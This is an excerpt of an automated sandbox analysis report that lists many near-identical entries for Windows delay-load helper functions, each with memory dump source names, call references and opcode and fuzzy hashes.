                                                                                              Uniqueness

                                                                                              Uniqueness Score: -1.00%

                                                                                              APIs
                                                                                              • ___delayLoadHelper2@8.DELAYIMP ref: 0032F556
                                                                                                • Part of subcall function 0032F9E9: DloadReleaseSectionWriteAccess.DELAYIMP ref: 0032FA5C
                                                                                                • Part of subcall function 0032F9E9: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 0032FA6D
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000003.00000002.1631398816.0000000000311000.00000020.00000001.01000000.00000009.sdmp, Offset: 00310000, based on PE: true
                                                                                              • Associated: 00000003.00000002.1631384190.0000000000310000.00000002.00000001.01000000.00000009.sdmp
                                                                                              • Associated: 00000003.00000002.1631423791.0000000000344000.00000002.00000001.01000000.00000009.sdmp
                                                                                              • Associated: 00000003.00000002.1631439370.0000000000350000.00000004.00000001.01000000.00000009.sdmp
                                                                                              • Associated: 00000003.00000002.1631439370.0000000000357000.00000004.00000001.01000000.00000009.sdmp
                                                                                              • Associated: 00000003.00000002.1631439370.0000000000374000.00000004.00000001.01000000.00000009.sdmp
                                                                                              • Associated: 00000003.00000002.1631484612.0000000000375000.00000002.00000001.01000000.00000009.sdmp
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_3_2_310000_work.jbxd
                                                                                              Similarity
                                                                                              • API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
                                                                                              • String ID:
                                                                                              • API String ID: 1269201914-0
                                                                                              • Opcode ID: d32858baf129c718db94820860400b1de0d06e38eb9b56a00dff7e1cff6ca555
                                                                                              • Instruction ID: 6e35bc7f49c9e7c0dc20d78a2d57d176f9e1b33dda84c57c4c3b82f9af1667b1
                                                                                              • Opcode Fuzzy Hash: d32858baf129c718db94820860400b1de0d06e38eb9b56a00dff7e1cff6ca555
                                                                                              • Instruction Fuzzy Hash: 1DB012E52E95207F320B56153C23F37016CD0C4B10330803BF004C9040D5805C400171
                                                                                              Uniqueness

                                                                                              Uniqueness Score: -1.00%

                                                                                              APIs
                                                                                              • ___delayLoadHelper2@8.DELAYIMP ref: 0032F556
                                                                                                • Part of subcall function 0032F9E9: DloadReleaseSectionWriteAccess.DELAYIMP ref: 0032FA5C
                                                                                                • Part of subcall function 0032F9E9: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 0032FA6D
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000003.00000002.1631398816.0000000000311000.00000020.00000001.01000000.00000009.sdmp, Offset: 00310000, based on PE: true
                                                                                              • Associated: 00000003.00000002.1631384190.0000000000310000.00000002.00000001.01000000.00000009.sdmp
                                                                                              • Associated: 00000003.00000002.1631423791.0000000000344000.00000002.00000001.01000000.00000009.sdmp
                                                                                              • Associated: 00000003.00000002.1631439370.0000000000350000.00000004.00000001.01000000.00000009.sdmp
                                                                                              • Associated: 00000003.00000002.1631439370.0000000000357000.00000004.00000001.01000000.00000009.sdmp
                                                                                              • Associated: 00000003.00000002.1631439370.0000000000374000.00000004.00000001.01000000.00000009.sdmp
                                                                                              • Associated: 00000003.00000002.1631484612.0000000000375000.00000002.00000001.01000000.00000009.sdmp
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_3_2_310000_work.jbxd
                                                                                              Similarity
                                                                                              • API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
                                                                                              • String ID:
                                                                                              • API String ID: 1269201914-0
                                                                                              • Opcode ID: a53300dde8f3337e8777a8168991fe8fefafc52e512539e872ef59ce415304a3
                                                                                              • Instruction ID: 1656d4e04b7aa62aba5927c0c3adb12ce91a47d24434fdbc4175eea9e597a862
                                                                                              • Opcode Fuzzy Hash: a53300dde8f3337e8777a8168991fe8fefafc52e512539e872ef59ce415304a3
                                                                                              • Instruction Fuzzy Hash: 80B012E52B84207F320B56157C23E37016CD0C4B10330863FF004C9040D5805C400071
                                                                                              Uniqueness

                                                                                              Uniqueness Score: -1.00%

                                                                                              APIs
                                                                                              • ___delayLoadHelper2@8.DELAYIMP ref: 0032F6AB
                                                                                                • Part of subcall function 0032F9E9: DloadReleaseSectionWriteAccess.DELAYIMP ref: 0032FA5C
                                                                                                • Part of subcall function 0032F9E9: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 0032FA6D
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000003.00000002.1631398816.0000000000311000.00000020.00000001.01000000.00000009.sdmp, Offset: 00310000, based on PE: true
                                                                                              • Associated: 00000003.00000002.1631384190.0000000000310000.00000002.00000001.01000000.00000009.sdmp
                                                                                              • Associated: 00000003.00000002.1631423791.0000000000344000.00000002.00000001.01000000.00000009.sdmp
                                                                                              • Associated: 00000003.00000002.1631439370.0000000000350000.00000004.00000001.01000000.00000009.sdmp
                                                                                              • Associated: 00000003.00000002.1631439370.0000000000357000.00000004.00000001.01000000.00000009.sdmp
                                                                                              • Associated: 00000003.00000002.1631439370.0000000000374000.00000004.00000001.01000000.00000009.sdmp
                                                                                              • Associated: 00000003.00000002.1631484612.0000000000375000.00000002.00000001.01000000.00000009.sdmp
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_3_2_310000_work.jbxd
                                                                                              Similarity
                                                                                              • API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
                                                                                              • String ID:
                                                                                              • API String ID: 1269201914-0
                                                                                              • Opcode ID: 5a860f43ed7af833f4d8880d68490cf1e17e60de26f6e7af187761a5e6a6ac42
                                                                                              • Instruction ID: 574713754ab8e1ed082e3320edaf18598ce1cc64bc100fa0d43ae12a78dbf5ab
                                                                                              • Opcode Fuzzy Hash: 5a860f43ed7af833f4d8880d68490cf1e17e60de26f6e7af187761a5e6a6ac42
                                                                                              • Instruction Fuzzy Hash: F4B012E63781107D330B51243C13D36016CC4C4B14330823BF004C8184D6811C880171
                                                                                              Uniqueness

                                                                                              Uniqueness Score: -1.00%

                                                                                              APIs
                                                                                              • ___delayLoadHelper2@8.DELAYIMP ref: 0032F6AB
                                                                                                • Part of subcall function 0032F9E9: DloadReleaseSectionWriteAccess.DELAYIMP ref: 0032FA5C
                                                                                                • Part of subcall function 0032F9E9: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 0032FA6D
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000003.00000002.1631398816.0000000000311000.00000020.00000001.01000000.00000009.sdmp, Offset: 00310000, based on PE: true
                                                                                              • Associated: 00000003.00000002.1631384190.0000000000310000.00000002.00000001.01000000.00000009.sdmp
                                                                                              • Associated: 00000003.00000002.1631423791.0000000000344000.00000002.00000001.01000000.00000009.sdmp
                                                                                              • Associated: 00000003.00000002.1631439370.0000000000350000.00000004.00000001.01000000.00000009.sdmp
                                                                                              • Associated: 00000003.00000002.1631439370.0000000000357000.00000004.00000001.01000000.00000009.sdmp
                                                                                              • Associated: 00000003.00000002.1631439370.0000000000374000.00000004.00000001.01000000.00000009.sdmp
                                                                                              • Associated: 00000003.00000002.1631484612.0000000000375000.00000002.00000001.01000000.00000009.sdmp
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_3_2_310000_work.jbxd
                                                                                              Similarity
                                                                                              • API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
                                                                                              • String ID:
                                                                                              • API String ID: 1269201914-0
                                                                                              • Opcode ID: 5215b26e3f8d149a4277d7295323dca0734aea30611680af9faddb7166096334
                                                                                              • Instruction ID: 801c5285322d374abc24377046370a9849744bb72836d30ac5f55d0cab17924f
                                                                                              • Opcode Fuzzy Hash: 5215b26e3f8d149a4277d7295323dca0734aea30611680af9faddb7166096334
                                                                                              • Instruction Fuzzy Hash: FCB012A67780107D320B51243D13D36016CC0C4B14330C13BF004CC084D6811C450171
                                                                                              Uniqueness

                                                                                              Uniqueness Score: -1.00%

                                                                                              APIs
                                                                                              • ___delayLoadHelper2@8.DELAYIMP ref: 0032F6AB
                                                                                                • Part of subcall function 0032F9E9: DloadReleaseSectionWriteAccess.DELAYIMP ref: 0032FA5C
                                                                                                • Part of subcall function 0032F9E9: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 0032FA6D
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000003.00000002.1631398816.0000000000311000.00000020.00000001.01000000.00000009.sdmp, Offset: 00310000, based on PE: true
                                                                                              • Associated: 00000003.00000002.1631384190.0000000000310000.00000002.00000001.01000000.00000009.sdmp
                                                                                              • Associated: 00000003.00000002.1631423791.0000000000344000.00000002.00000001.01000000.00000009.sdmp
                                                                                              • Associated: 00000003.00000002.1631439370.0000000000350000.00000004.00000001.01000000.00000009.sdmp
                                                                                              • Associated: 00000003.00000002.1631439370.0000000000357000.00000004.00000001.01000000.00000009.sdmp
                                                                                              • Associated: 00000003.00000002.1631439370.0000000000374000.00000004.00000001.01000000.00000009.sdmp
                                                                                              • Associated: 00000003.00000002.1631484612.0000000000375000.00000002.00000001.01000000.00000009.sdmp
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_3_2_310000_work.jbxd
                                                                                              Similarity
                                                                                              • API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
                                                                                              • String ID:
                                                                                              • API String ID: 1269201914-0
                                                                                              • Opcode ID: 5d8f82c590b24a5b7ec5e62fba32a0b31dee16b6b94180fc32c53e22c80b4bcd
                                                                                              • Instruction ID: e2e9455a4a4796dd7794a00eb70bac1a1a0504ae5dcfc357c903265cec41622b
                                                                                              • Opcode Fuzzy Hash: 5d8f82c590b24a5b7ec5e62fba32a0b31dee16b6b94180fc32c53e22c80b4bcd
                                                                                              • Instruction Fuzzy Hash: 39B012AA7790107D320B1110BD13C36012CC8C0B14330C13BF000DC08194811C450071
                                                                                              Uniqueness

                                                                                              Uniqueness Score: -1.00%

                                                                                              APIs
                                                                                              • ___delayLoadHelper2@8.DELAYIMP ref: 0032F6AB
                                                                                                • Part of subcall function 0032F9E9: DloadReleaseSectionWriteAccess.DELAYIMP ref: 0032FA5C
                                                                                                • Part of subcall function 0032F9E9: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 0032FA6D
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000003.00000002.1631398816.0000000000311000.00000020.00000001.01000000.00000009.sdmp, Offset: 00310000, based on PE: true
                                                                                              • Associated: 00000003.00000002.1631384190.0000000000310000.00000002.00000001.01000000.00000009.sdmp
                                                                                              • Associated: 00000003.00000002.1631423791.0000000000344000.00000002.00000001.01000000.00000009.sdmp
                                                                                              • Associated: 00000003.00000002.1631439370.0000000000350000.00000004.00000001.01000000.00000009.sdmp
                                                                                              • Associated: 00000003.00000002.1631439370.0000000000357000.00000004.00000001.01000000.00000009.sdmp
                                                                                              • Associated: 00000003.00000002.1631439370.0000000000374000.00000004.00000001.01000000.00000009.sdmp
                                                                                              • Associated: 00000003.00000002.1631484612.0000000000375000.00000002.00000001.01000000.00000009.sdmp
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_3_2_310000_work.jbxd
                                                                                              Similarity
                                                                                              • API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
                                                                                              • String ID:
                                                                                              • API String ID: 1269201914-0
                                                                                              • Opcode ID: a80feed91823fb483d84169d4b2810e2d097ed4a03b6147575f86853807eb463
                                                                                              • Instruction ID: 92d440814e11f63e46631be06bb6fe8448ca4ac0ecfc683b2de251aaea2c0cb9
                                                                                              • Opcode Fuzzy Hash: a80feed91823fb483d84169d4b2810e2d097ed4a03b6147575f86853807eb463
                                                                                              • Instruction Fuzzy Hash: E0B012A6378110BD320B51143C13D3A017CC0C4B14330C13BF404CD084D4802C441171
                                                                                              Uniqueness

                                                                                              Uniqueness Score: -1.00%

                                                                                              APIs
                                                                                              • ___delayLoadHelper2@8.DELAYIMP ref: 0032F6AB
                                                                                                • Part of subcall function 0032F9E9: DloadReleaseSectionWriteAccess.DELAYIMP ref: 0032FA5C
                                                                                                • Part of subcall function 0032F9E9: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 0032FA6D
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000003.00000002.1631398816.0000000000311000.00000020.00000001.01000000.00000009.sdmp, Offset: 00310000, based on PE: true
                                                                                              • Associated: 00000003.00000002.1631384190.0000000000310000.00000002.00000001.01000000.00000009.sdmp
                                                                                              • Associated: 00000003.00000002.1631423791.0000000000344000.00000002.00000001.01000000.00000009.sdmp
                                                                                              • Associated: 00000003.00000002.1631439370.0000000000350000.00000004.00000001.01000000.00000009.sdmp
                                                                                              • Associated: 00000003.00000002.1631439370.0000000000357000.00000004.00000001.01000000.00000009.sdmp
                                                                                              • Associated: 00000003.00000002.1631439370.0000000000374000.00000004.00000001.01000000.00000009.sdmp
                                                                                              • Associated: 00000003.00000002.1631484612.0000000000375000.00000002.00000001.01000000.00000009.sdmp
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_3_2_310000_work.jbxd
                                                                                              Similarity
                                                                                              • API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
                                                                                              • String ID:
                                                                                              • API String ID: 1269201914-0
                                                                                              • Opcode ID: 483478398b14689786cfcb2a3c3c5b95d9d9d2ddb54e900c8513fd8fba0e55e0
                                                                                              • Instruction ID: 037f708dd43c015ee7da8d52319abcbb4855fbf7f87f44ffabc7d25c79e8c117
                                                                                              • Opcode Fuzzy Hash: 483478398b14689786cfcb2a3c3c5b95d9d9d2ddb54e900c8513fd8fba0e55e0
                                                                                              • Instruction Fuzzy Hash: 3EB012A63780107D320B51243C23E36016CD0C4B14330813BF004C8484D6801C440171
                                                                                              Uniqueness

                                                                                              Uniqueness Score: -1.00%

                                                                                              APIs
                                                                                              • ___delayLoadHelper2@8.DELAYIMP ref: 0032F70C
                                                                                                • Part of subcall function 0032F9E9: DloadReleaseSectionWriteAccess.DELAYIMP ref: 0032FA5C
                                                                                                • Part of subcall function 0032F9E9: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 0032FA6D
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000003.00000002.1631398816.0000000000311000.00000020.00000001.01000000.00000009.sdmp, Offset: 00310000, based on PE: true
                                                                                              • Associated: 00000003.00000002.1631384190.0000000000310000.00000002.00000001.01000000.00000009.sdmp
                                                                                              • Associated: 00000003.00000002.1631423791.0000000000344000.00000002.00000001.01000000.00000009.sdmp
                                                                                              • Associated: 00000003.00000002.1631439370.0000000000350000.00000004.00000001.01000000.00000009.sdmp
                                                                                              • Associated: 00000003.00000002.1631439370.0000000000357000.00000004.00000001.01000000.00000009.sdmp
                                                                                              • Associated: 00000003.00000002.1631439370.0000000000374000.00000004.00000001.01000000.00000009.sdmp
                                                                                              • Associated: 00000003.00000002.1631484612.0000000000375000.00000002.00000001.01000000.00000009.sdmp
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_3_2_310000_work.jbxd
                                                                                              Similarity
                                                                                              • API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
                                                                                              • String ID:
                                                                                              • API String ID: 1269201914-0
                                                                                              • Opcode ID: 9b255c972cd8d761707193c86e7078a30da0a287b3b265b9e5f6d6a2807438d7
                                                                                              • Instruction ID: aa7edd5a898f243239637d89d1b55c6bfb3f48618c3be9f0ab2bbdb92c436c0f
                                                                                              • Opcode Fuzzy Hash: 9b255c972cd8d761707193c86e7078a30da0a287b3b265b9e5f6d6a2807438d7
                                                                                              • Instruction Fuzzy Hash: CAB012A52682107E325B51183D13E36016CC4C0B21330893FF004CC440D4846CC01031
                                                                                              Uniqueness

                                                                                              Uniqueness Score: -1.00%

                                                                                              APIs
                                                                                              • ___delayLoadHelper2@8.DELAYIMP ref: 0032F70C
                                                                                                • Part of subcall function 0032F9E9: DloadReleaseSectionWriteAccess.DELAYIMP ref: 0032FA5C
                                                                                                • Part of subcall function 0032F9E9: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 0032FA6D
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000003.00000002.1631398816.0000000000311000.00000020.00000001.01000000.00000009.sdmp, Offset: 00310000, based on PE: true
                                                                                              • Associated: 00000003.00000002.1631384190.0000000000310000.00000002.00000001.01000000.00000009.sdmp
                                                                                              • Associated: 00000003.00000002.1631423791.0000000000344000.00000002.00000001.01000000.00000009.sdmp
                                                                                              • Associated: 00000003.00000002.1631439370.0000000000350000.00000004.00000001.01000000.00000009.sdmp
                                                                                              • Associated: 00000003.00000002.1631439370.0000000000357000.00000004.00000001.01000000.00000009.sdmp
                                                                                              • Associated: 00000003.00000002.1631439370.0000000000374000.00000004.00000001.01000000.00000009.sdmp
                                                                                              • Associated: 00000003.00000002.1631484612.0000000000375000.00000002.00000001.01000000.00000009.sdmp
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_3_2_310000_work.jbxd
                                                                                              Similarity
                                                                                              • API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
                                                                                              • String ID:
                                                                                              • API String ID: 1269201914-0
                                                                                              • Opcode ID: d191b870a800277609cb6ba82088613d1884df22673101d13df3b50a4a700ce8
                                                                                              • Instruction ID: 37d676dea5a73eb8fdac80367316aa97eaa79d52346ba8d748aadfe5cef0f865
                                                                                              • Opcode Fuzzy Hash: d191b870a800277609cb6ba82088613d1884df22673101d13df3b50a4a700ce8
                                                                                              • Instruction Fuzzy Hash: 4EB012A52682107E321B51183D13E3A016CC4C0B25330C43FF404CD040D4846C841031
                                                                                              Uniqueness

                                                                                              Uniqueness Score: -1.00%

                                                                                              APIs
                                                                                              • ___delayLoadHelper2@8.DELAYIMP ref: 0032F70C
                                                                                                • Part of subcall function 0032F9E9: DloadReleaseSectionWriteAccess.DELAYIMP ref: 0032FA5C
                                                                                                • Part of subcall function 0032F9E9: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 0032FA6D
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000003.00000002.1631398816.0000000000311000.00000020.00000001.01000000.00000009.sdmp, Offset: 00310000, based on PE: true
                                                                                              • Associated: 00000003.00000002.1631384190.0000000000310000.00000002.00000001.01000000.00000009.sdmp
                                                                                              • Associated: 00000003.00000002.1631423791.0000000000344000.00000002.00000001.01000000.00000009.sdmp
                                                                                              • Associated: 00000003.00000002.1631439370.0000000000350000.00000004.00000001.01000000.00000009.sdmp
                                                                                              • Associated: 00000003.00000002.1631439370.0000000000357000.00000004.00000001.01000000.00000009.sdmp
                                                                                              • Associated: 00000003.00000002.1631439370.0000000000374000.00000004.00000001.01000000.00000009.sdmp
                                                                                              • Associated: 00000003.00000002.1631484612.0000000000375000.00000002.00000001.01000000.00000009.sdmp
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_3_2_310000_work.jbxd
                                                                                              Similarity
                                                                                              • API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
                                                                                              • String ID:
                                                                                              • API String ID: 1269201914-0
                                                                                              • Opcode ID: 89d940542775bc182092bc3a6ee36c65977409517b670e2d9d8a3f86ac709c8e
                                                                                              • Instruction ID: 170f1dc8cbc9f1834217b1cc8c41d0ad57b6c8a633bcd4aec7e8903ea46f7ad2
                                                                                              • Opcode Fuzzy Hash: 89d940542775bc182092bc3a6ee36c65977409517b670e2d9d8a3f86ac709c8e
                                                                                              • Instruction Fuzzy Hash: 2BB012A56681107E320B51183E13E36016CC4C0B11330843FF005CC040D6C05D810031
                                                                                              Uniqueness

                                                                                              Uniqueness Score: -1.00%

                                                                                              APIs
                                                                                              • ___delayLoadHelper2@8.DELAYIMP ref: 0032F33D
                                                                                                • Part of subcall function 0032F9E9: DloadReleaseSectionWriteAccess.DELAYIMP ref: 0032FA5C
                                                                                                • Part of subcall function 0032F9E9: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 0032FA6D
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000003.00000002.1631398816.0000000000311000.00000020.00000001.01000000.00000009.sdmp, Offset: 00310000, based on PE: true
                                                                                              • Associated: 00000003.00000002.1631384190.0000000000310000.00000002.00000001.01000000.00000009.sdmp
                                                                                              • Associated: 00000003.00000002.1631423791.0000000000344000.00000002.00000001.01000000.00000009.sdmp
                                                                                              • Associated: 00000003.00000002.1631439370.0000000000350000.00000004.00000001.01000000.00000009.sdmp
                                                                                              • Associated: 00000003.00000002.1631439370.0000000000357000.00000004.00000001.01000000.00000009.sdmp
                                                                                              • Associated: 00000003.00000002.1631439370.0000000000374000.00000004.00000001.01000000.00000009.sdmp
                                                                                              • Associated: 00000003.00000002.1631484612.0000000000375000.00000002.00000001.01000000.00000009.sdmp
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_3_2_310000_work.jbxd
                                                                                              Similarity
                                                                                              • API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
                                                                                              • String ID:
                                                                                              • API String ID: 1269201914-0
                                                                                              • Opcode ID: b03cee7e5de3f3aed435f773838288d3bc42f9538e914e21dfa6294484c79650
                                                                                              • Instruction ID: c0ddf8673e2c2cb2a60dcd4c42b33ae22b72cd3f096b26c5b04c7f59f384384d
                                                                                              • Opcode Fuzzy Hash: b03cee7e5de3f3aed435f773838288d3bc42f9538e914e21dfa6294484c79650
                                                                                              • Instruction Fuzzy Hash: C8A001AA6A9123BD368AA2617D27D7A02BCC4D4B65334893EF50288581A9802C8665B1
                                                                                              Uniqueness

                                                                                              Uniqueness Score: -1.00%

                                                                                              APIs
                                                                                              • ___delayLoadHelper2@8.DELAYIMP ref: 0032F33D
                                                                                                • Part of subcall function 0032F9E9: DloadReleaseSectionWriteAccess.DELAYIMP ref: 0032FA5C
                                                                                                • Part of subcall function 0032F9E9: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 0032FA6D
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000003.00000002.1631398816.0000000000311000.00000020.00000001.01000000.00000009.sdmp, Offset: 00310000, based on PE: true
                                                                                              • Associated: 00000003.00000002.1631384190.0000000000310000.00000002.00000001.01000000.00000009.sdmp
                                                                                              • Associated: 00000003.00000002.1631423791.0000000000344000.00000002.00000001.01000000.00000009.sdmp
                                                                                              • Associated: 00000003.00000002.1631439370.0000000000350000.00000004.00000001.01000000.00000009.sdmp
                                                                                              • Associated: 00000003.00000002.1631439370.0000000000357000.00000004.00000001.01000000.00000009.sdmp
                                                                                              • Associated: 00000003.00000002.1631439370.0000000000374000.00000004.00000001.01000000.00000009.sdmp
                                                                                              • Associated: 00000003.00000002.1631484612.0000000000375000.00000002.00000001.01000000.00000009.sdmp
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_3_2_310000_work.jbxd
                                                                                              Similarity
                                                                                              • API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
                                                                                              • String ID:
                                                                                              • API String ID: 1269201914-0
                                                                                              • Opcode ID: 14e354f31a348c573ef57aaeca33394f6f65b78b724987dc8a0e9b92e148ba23
                                                                                              • Instruction ID: c0ddf8673e2c2cb2a60dcd4c42b33ae22b72cd3f096b26c5b04c7f59f384384d
                                                                                              • Opcode Fuzzy Hash: 14e354f31a348c573ef57aaeca33394f6f65b78b724987dc8a0e9b92e148ba23
                                                                                              • Instruction Fuzzy Hash: C8A001AA6A9123BD368AA2617D27D7A02BCC4D4B65334893EF50288581A9802C8665B1
                                                                                              Uniqueness

                                                                                              Uniqueness Score: -1.00%

                                                                                              APIs
                                                                                              • ___delayLoadHelper2@8.DELAYIMP ref: 0032F33D
                                                                                                • Part of subcall function 0032F9E9: DloadReleaseSectionWriteAccess.DELAYIMP ref: 0032FA5C
                                                                                                • Part of subcall function 0032F9E9: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 0032FA6D
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000003.00000002.1631398816.0000000000311000.00000020.00000001.01000000.00000009.sdmp, Offset: 00310000, based on PE: true
                                                                                              • Associated: 00000003.00000002.1631384190.0000000000310000.00000002.00000001.01000000.00000009.sdmp
                                                                                              • Associated: 00000003.00000002.1631423791.0000000000344000.00000002.00000001.01000000.00000009.sdmp
                                                                                              • Associated: 00000003.00000002.1631439370.0000000000350000.00000004.00000001.01000000.00000009.sdmp
                                                                                              • Associated: 00000003.00000002.1631439370.0000000000357000.00000004.00000001.01000000.00000009.sdmp
                                                                                              • Associated: 00000003.00000002.1631439370.0000000000374000.00000004.00000001.01000000.00000009.sdmp
                                                                                              • Associated: 00000003.00000002.1631484612.0000000000375000.00000002.00000001.01000000.00000009.sdmp
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_3_2_310000_work.jbxd
                                                                                              Similarity
                                                                                              • API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
                                                                                              • String ID:
                                                                                              • API String ID: 1269201914-0
                                                                                              • Opcode ID: 70a1d0b7057bc9fa7b84e0ddc99eace76eb4bfa6bc827222f9bbc2e94296c679
                                                                                              • Instruction ID: c0ddf8673e2c2cb2a60dcd4c42b33ae22b72cd3f096b26c5b04c7f59f384384d
                                                                                              • Opcode Fuzzy Hash: 70a1d0b7057bc9fa7b84e0ddc99eace76eb4bfa6bc827222f9bbc2e94296c679
                                                                                              • Instruction Fuzzy Hash: C8A001AA6A9123BD368AA2617D27D7A02BCC4D4B65334893EF50288581A9802C8665B1
                                                                                              Uniqueness

                                                                                              Uniqueness Score: -1.00%

                                                                                              APIs
                                                                                              • ___delayLoadHelper2@8.DELAYIMP ref: 0032F33D
                                                                                                • Part of subcall function 0032F9E9: DloadReleaseSectionWriteAccess.DELAYIMP ref: 0032FA5C
                                                                                                • Part of subcall function 0032F9E9: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 0032FA6D
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000003.00000002.1631398816.0000000000311000.00000020.00000001.01000000.00000009.sdmp, Offset: 00310000, based on PE: true
                                                                                              • Associated: 00000003.00000002.1631384190.0000000000310000.00000002.00000001.01000000.00000009.sdmp
                                                                                              • Associated: 00000003.00000002.1631423791.0000000000344000.00000002.00000001.01000000.00000009.sdmp
                                                                                              • Associated: 00000003.00000002.1631439370.0000000000350000.00000004.00000001.01000000.00000009.sdmp
                                                                                              • Associated: 00000003.00000002.1631439370.0000000000357000.00000004.00000001.01000000.00000009.sdmp
                                                                                              • Associated: 00000003.00000002.1631439370.0000000000374000.00000004.00000001.01000000.00000009.sdmp
                                                                                              • Associated: 00000003.00000002.1631484612.0000000000375000.00000002.00000001.01000000.00000009.sdmp
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_3_2_310000_work.jbxd
                                                                                              Similarity
                                                                                              • API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
                                                                                              • String ID:
                                                                                              • API String ID: 1269201914-0
                                                                                              • Opcode ID: 99f13127c77671b990ad214c1b9a06ec398f2d0bfc7b9ffac260b0fe6c7b1580
                                                                                              • Instruction ID: c0ddf8673e2c2cb2a60dcd4c42b33ae22b72cd3f096b26c5b04c7f59f384384d
                                                                                              • Opcode Fuzzy Hash: 99f13127c77671b990ad214c1b9a06ec398f2d0bfc7b9ffac260b0fe6c7b1580
                                                                                              • Instruction Fuzzy Hash: C8A001AA6A9123BD368AA2617D27D7A02BCC4D4B65334893EF50288581A9802C8665B1
                                                                                              Uniqueness

                                                                                              Uniqueness Score: -1.00%

                                                                                              APIs
                                                                                              • ___delayLoadHelper2@8.DELAYIMP ref: 0032F33D
                                                                                                • Part of subcall function 0032F9E9: DloadReleaseSectionWriteAccess.DELAYIMP ref: 0032FA5C
                                                                                                • Part of subcall function 0032F9E9: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 0032FA6D
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000003.00000002.1631398816.0000000000311000.00000020.00000001.01000000.00000009.sdmp, Offset: 00310000, based on PE: true
                                                                                              • Associated: 00000003.00000002.1631384190.0000000000310000.00000002.00000001.01000000.00000009.sdmp
                                                                                              • Associated: 00000003.00000002.1631423791.0000000000344000.00000002.00000001.01000000.00000009.sdmp
                                                                                              • Associated: 00000003.00000002.1631439370.0000000000350000.00000004.00000001.01000000.00000009.sdmp
                                                                                              • Associated: 00000003.00000002.1631439370.0000000000357000.00000004.00000001.01000000.00000009.sdmp
                                                                                              • Associated: 00000003.00000002.1631439370.0000000000374000.00000004.00000001.01000000.00000009.sdmp
                                                                                              • Associated: 00000003.00000002.1631484612.0000000000375000.00000002.00000001.01000000.00000009.sdmp
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_3_2_310000_work.jbxd
                                                                                              Similarity
                                                                                              • API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
                                                                                              • String ID:
                                                                                              • API String ID: 1269201914-0
                                                                                              • Opcode ID: 181adfd4ff33e6a2b18b58122fd5b9efb0379beac7e465c6f915233a850a97d7
                                                                                              • Instruction ID: c0ddf8673e2c2cb2a60dcd4c42b33ae22b72cd3f096b26c5b04c7f59f384384d
                                                                                              • Opcode Fuzzy Hash: 181adfd4ff33e6a2b18b58122fd5b9efb0379beac7e465c6f915233a850a97d7
                                                                                              • Instruction Fuzzy Hash: C8A001AA6A9123BD368AA2617D27D7A02BCC4D4B65334893EF50288581A9802C8665B1
                                                                                              Uniqueness

                                                                                              Uniqueness Score: -1.00%

